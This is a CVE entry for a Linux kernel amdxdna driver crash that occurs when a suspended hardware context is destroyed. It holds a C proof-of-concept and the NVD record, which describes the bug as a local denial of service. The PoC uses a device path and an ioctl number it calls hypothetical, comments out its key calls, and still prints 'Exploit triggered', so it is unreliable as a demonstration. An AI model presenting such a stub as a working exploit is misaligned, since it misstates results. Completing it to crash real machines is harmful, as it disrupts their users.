CVE-2026-23341

/* * PoC for CVE-2026-23341 * Concept: Trigger NULL pointer dereference in amdxdna driver * by destroying a suspended context. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define DEVICE_PATH "/dev/accel/accel0" // Hypothetical device path #define DESTROY_CONTEXT_IOCTL 0x4001 // Hypothetical IOCTL command int main() { int fd; printf("[+] Attempting to open device...\n"); fd = open(DEVICE_PATH, O_RDWR); if (fd < 0) { perror("[-] Failed to open device"); return 1; } printf("[+] Device opened. Creating context...\n"); // Step 1: Create a context (Implementation specific) // int ctx_id = create_context(fd); printf("[+] Waiting for context to auto-suspend...\n"); // Step 2: Wait for idle timeout to trigger automatic suspension sleep(10); printf("[+] Attempting to destroy suspended context...\n"); // Step 3: Issue ioctl to destroy context without checking NULL pointer // if (ioctl(fd, DESTROY_CONTEXT_IOCTL, &ctx_id) < 0) { // perror("ioctl failed"); // } // If vulnerable, kernel crashes here printf("[+] Exploit triggered.\n"); close(fd); return 0; }

{"cve": {"id": "CVE-2026-23341", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:32.013", "lastModified": "2026-04-23T21:16:30.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/amdxdna: Fix crash when destroying a suspended hardware context\n\nIf userspace issues an ioctl to destroy a hardware context that has\nalready been automatically suspended, the driver may crash because the\nmailbox channel pointer is NULL for the suspended context.\n\nFix this by checking the mailbox channel pointer in aie2_destroy_context()\nbefore accessing it."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\naccel/amdxdna: Corrige un fallo al destruir un contexto de hardware suspendido\n\nSi el espacio de usuario emite un ioctl para destruir un contexto de hardware que ya ha sido suspendido automáticamente, el controlador puede fallar porque el puntero del canal del buzón es NULL para el contexto suspendido.\n\nSoluciona esto comprobando el puntero del canal del buzón en aie2_destroy_context() antes de acceder a él."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19.4", "versionEndExcluding": "6.19.7", "matchCriteriaId": "EABFC675-2A5E-4569-92F7-1E8942DA0683"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/8363c02863332992a1822688da41f881d88d1631", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a6317704edab95d66a62fc1861d9546284ab678e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}